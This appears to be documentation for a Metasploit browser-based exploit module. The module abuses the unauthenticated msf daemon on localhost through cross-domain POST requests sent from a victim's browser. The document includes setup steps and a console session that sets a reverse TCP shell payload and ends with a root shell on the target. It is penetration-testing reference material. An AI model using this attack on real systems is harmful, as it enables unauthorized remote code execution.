Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

Description

This module connects to the Metasploit msf daemon and uses the ruby interpreter to achieve a shell. This module can be used when the vulnerable service is only listening on localhost and the attacker has not achieved a foothold on the machine. To achieve code execution, the data is sent from the victim's browser. To achieve this, the victim must visit the attacker's web site.

Vulnerable Application

Metasploit has a legacy method of providing remote access. The msf daemon provides no means of authentication and is therefore vulnerable against an attacker who has IP access to the daemon. In those cases where the daemon is listening on localhost, we take advantage of the fact that the victim's web browser has IP access to the daemon.

Because the msfconsole-program is line-based, it is possible to successfully send commands through the HTTP-protocol. This module takes advantage of this by placing the msfconsole-command in the POST-data of a HTTP-request. Since these POST-requests are considered safe to send cross-domain, it is possible to send them from the attacker's web application and to localhost using the victim's browser.

All versions of Metasploit are affected by this module, however testing has only been performed on the following targets:

• Metasploit 5.0.0 on Ubuntu 16.04 (using Firefox and Chrome)

• Metasploit 4.16.51 on Windows 7 (using IE, exploitation failed in Firefox and Chrome)

NB! Exploitation on Windows had a higher degree of success, when the quiet-flag was sent to the msf daemon. On Linux, it made no difference.

Source code and installers:

• Source Code Repository

• Installers

Verification Steps

1. Start the vulnerable service msfd -q -f

2. Start msfconsole

3. Do: use exploit/multi/browser/msfd_rce_browser

4. Do: set REMOTE_IP [IP] (default: 127.0.0.1)

5. Do: set RPORT [PORT] (default: 55554)

6. Do: set PAYLOAD [PAYLOAD]

7. Do: exploit

8. Do: Visit the listed URL from the victim's machine

9. You should get a shell

Options

Options unique for this module is described below.

REMOTE_IP

IP to target when running inside the victim's browser.

REMOTE_PORT

Remote port the vulnerable service is running at, default is 55554.

Scenarios

Through the victim's browser

 msf5 > use exploit/multi/browser/msfd_rce_browser
 msf5 exploit(multi/browser/msfd_rce_browser) > set payload ruby/shell_reverse_tcp
 payload => ruby/shell_reverse_tcp
 msf5 exploit(multi/browser/msfd_rce_browser) > set lhost 192.168.0.17
 lhost => 192.168.0.17
 msf5 exploit(multi/browser/msfd_rce_browser) > set lport 443
 lport => 443
 msf5 exploit(multi/browser/msfd_rce_browser) > exploit
 [*] Exploit running as background job 0.

 [-] Handler failed to bind to 192.168.0.17:443:-  -
 [*] Started reverse TCP handler on 0.0.0.0:443
 msf5 exploit(multi/browser/msfd_rce_browser) > [*] Using URL:
 http://0.0.0.0:8080/J5ras6oYftFWW4
 [*] Local IP: http://172.17.0.2:8080/J5ras6oYftFWW4
 [*] Server started.

Visit the web site listed in a browser on the victim's machine and you should get the output below.

 [*] 192.168.0.17     msfd_rce_browser - 192.168.0.17     msfd_rce_browser
 Sending HTML...
 [*] Command shell session 4 opened (172.17.0.2:443 -> 192.168.0.17:48376) at 2018-04-22 19:15:07 +0000
 id
 [*] exec: id

 uid=0(root) gid=0(root) groups=0(root)